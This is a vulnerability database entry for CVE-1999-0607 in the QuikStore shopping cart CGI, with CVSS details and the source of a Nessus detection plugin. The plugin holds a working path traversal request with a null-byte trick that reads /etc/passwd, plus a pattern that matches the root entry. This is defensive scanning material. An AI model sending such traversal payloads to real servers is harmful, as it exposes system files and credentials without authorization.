Vulnerabilities > CVE-1999-0607 - Unspecified vulnerability in I-Soft Quikstore

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
i-soft
nessus

Summary

quikstore.cgi in QuikStore shopping cart stores quikstore.cfg under the web document root with insufficient access control, which allows remote attackers to obtain the cleartext administrator password and gain privileges.

Vulnerable Configurations

Part Description Count
Application
I-Soft
1

Nessus

NASL familyCGI abuses
NASL idQUICKSTORE.NASL
descriptionThe CGI
last seen2020-06-01
modified2020-06-02
plugin id10712
published2001-08-04
reporterThis script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10712
titleQuikstore Shopping Cart quikstore.cgi Multiple Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(10712);
 script_version ("1.24");
 script_cve_id("CVE-1999-0607", "CVE-2000-1188");
 script_bugtraq_id(1983);
 
 script_name(english:"Quikstore Shopping Cart quikstore.cgi Multiple Vulnerabilities");
 
 script_set_attribute(attribute:"synopsis", value:
"Arbitrary files can be run on the remote host." );
 script_set_attribute(attribute:"description", value:
"The CGI 'quickstore.cgi' is installed. This CGI has a well known 
security flaw that lets an attacker read arbitrary files with the 
privileges of the HTTP daemon." );
 script_set_attribute(attribute:"solution", value:
"Remove it from /cgi-bin or upgrade to the latest version." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2001/08/04");
 script_set_attribute(attribute:"vuln_publication_date", value: "1999/04/20");
 script_cvs_date("Date: 2018/07/27 12:15:50");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 script_summary(english:"Checks for the presence of /cgi-bin/quickstore.cgi");
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencie("http_version.nasl", "webmirror.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

foreach dir (cgi_dirs())
{
req = string(dir,
 "/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=");
r = http_send_recv3(method: "GET", item:req, port:port);
if (isnull(r)) exit(0);
if(egrep(pattern:".*root:.*:0:[01]:.*", string: r[0]+r[1]+r[2]))
security_warning(port, extra: 
strcat('\nThe following URL exhibits the flaw :\n', build_url(port: port, qs: req)));
}